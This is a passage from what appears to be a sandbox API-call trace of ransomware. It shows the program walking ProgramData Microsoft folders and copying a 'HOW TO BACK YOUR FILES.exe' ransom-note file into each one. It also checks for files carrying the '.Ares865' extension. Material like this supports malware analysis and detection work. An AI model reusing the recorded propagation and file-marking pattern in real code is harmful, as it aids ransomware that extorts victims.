FILES.exe") returned -1 [0090.293] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.293] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework" [0090.293] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1888 | out: hHeap=0x2b0000) returned 1 [0090.293] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0090.293] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework") returned 58 [0090.293] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework" [0090.293] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.293] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\netframework\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.294] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.294] GetLastError () returned 0x0 [0090.294] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.294] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.294] CloseHandle (hObject=0x120) returned 1 [0090.294] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.294] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.294] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.294] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.294] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.294] lstrcpyW (in: lpString1=0x2cce476, lpString2="BreadcrumbStore" | out: lpString1="BreadcrumbStore") returned="BreadcrumbStore" [0090.294] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0090.294] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x96) returned 0x334fc8 [0090.294] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0090.295] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore" [0090.295] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0090.295] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0090.295] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore") returned 74 [0090.295] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore" [0090.295] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.295] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\netframework\\breadcrumbstore\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.295] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.295] GetLastError () returned 0x0 [0090.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.295] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.296] CloseHandle (hObject=0x120) returned 1 [0090.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.296] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.296] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.296] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.296] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.296] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN" [0090.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4860 | out: hHeap=0x2b0000) returned 1 [0090.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0090.296] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN") returned 50 [0090.296] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN" [0090.296] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.296] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\msdn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.297] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.297] GetLastError () returned 0x0 [0090.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.297] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.297] CloseHandle (hObject=0x120) returned 1 [0090.297] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.297] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.297] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.297] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.297] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.297] lstrcpyW (in: lpString1=0x2cce466, lpString2="8.0" | out: lpString1="8.0") returned="8.0" [0090.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7788 [0090.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6e) returned 0x2d2fe0 [0090.298] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7790 | out: ListHead=0x2e7710, ListEntry=0x2e7790) returned 0x2e77d0 [0090.298] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN\\8.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN\\8.0") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN\\8.0" [0090.298] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0090.298] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0090.298] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN\\8.0") returned 54 [0090.298] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN\\8.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN\\8.0") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN\\8.0" [0090.298] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.298] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN\\8.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\msdn\\8.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.298] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.299] GetLastError () returned 0x0 [0090.299] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.299] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.299] CloseHandle (hObject=0x120) returned 1 [0090.299] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.299] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.299] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\MSDN\\8.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c65bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.299] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.299] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.299] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\MF", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\MF") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\MF" [0090.299] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e47f0 | out: hHeap=0x2b0000) returned 1 [0090.299] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0090.299] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\MF") returned 48 [0090.299] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\MF" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\MF") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\MF" [0090.299] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.299] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\MF\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\mf\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.300] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.300] GetLastError () returned 0x0 [0090.300] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.300] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.300] CloseHandle (hObject=0x120) returned 1 [0090.300] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.300] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.300] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\MF\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x669bffe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x669bffe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.300] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.300] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.301] lstrcpyW (in: lpString1=0x2cce462, lpString2="Active.GRL.Ares865" | out: lpString1="Active.GRL.Ares865") returned="Active.GRL.Ares865" [0090.301] lstrlenW (lpString="Active.GRL.Ares865") returned 18 [0090.301] lstrlenW (lpString="Ares865") returned 7 [0090.301] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.301] lstrcpyW (in: lpString1=0x2cce462, lpString2="Pending.GRL.Ares865" | out: lpString1="Pending.GRL.Ares865") returned="Pending.GRL.Ares865" [0090.301] lstrlenW (lpString="Pending.GRL.Ares865") returned 19 [0090.301] lstrlenW (lpString="Ares865") returned 7 [0090.301] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.301] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Media Player" [0090.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1688 | out: hHeap=0x2b0000) returned 1 [0090.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0090.301] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Media Player") returned 58 [0090.301] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Media Player" [0090.301] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.301] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.302] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.302] GetLastError () returned 0x0 [0090.302] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.302] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.302] CloseHandle (hObject=0x120) returned 1 [0090.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.302] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.302] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c65bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.302] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.302] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.303] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\IdentityCRL", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\IdentityCRL") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\IdentityCRL" [0090.303] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1808 | out: hHeap=0x2b0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0090.303] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\IdentityCRL") returned 57 [0090.303] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\IdentityCRL" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\IdentityCRL") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\IdentityCRL" [0090.303] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.303] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\IdentityCRL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\identitycrl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.304] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.304] GetLastError () returned 0x0 [0090.304] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.304] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.304] CloseHandle (hObject=0x120) returned 1 [0090.304] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.304] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.304] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66a32400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66a32400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.304] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.304] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.304] lstrcpyW (in: lpString1=0x2cce474, lpString2="ppcrlconfig.dll.Ares865" | out: lpString1="ppcrlconfig.dll.Ares865") returned="ppcrlconfig.dll.Ares865" [0090.304] lstrlenW (lpString="ppcrlconfig.dll.Ares865") returned 23 [0090.304] lstrlenW (lpString="Ares865") returned 7 [0090.304] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.305] lstrcpyW (in: lpString1=0x2cce474, lpString2="ppcrlui.dll.Ares865" | out: lpString1="ppcrlui.dll.Ares865") returned="ppcrlui.dll.Ares865" [0090.305] lstrlenW (lpString="ppcrlui.dll.Ares865") returned 19 [0090.305] lstrlenW (lpString="Ares865") returned 7 [0090.305] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.305] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer" [0090.305] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0090.305] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0090.305] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer") returned 58 [0090.305] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer" [0090.305] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.305] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\event viewer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.305] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.306] GetLastError () returned 0x0 [0090.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.306] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.306] CloseHandle (hObject=0x120) returned 1 [0090.306] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.306] lstrcatW (in: lpString1="", 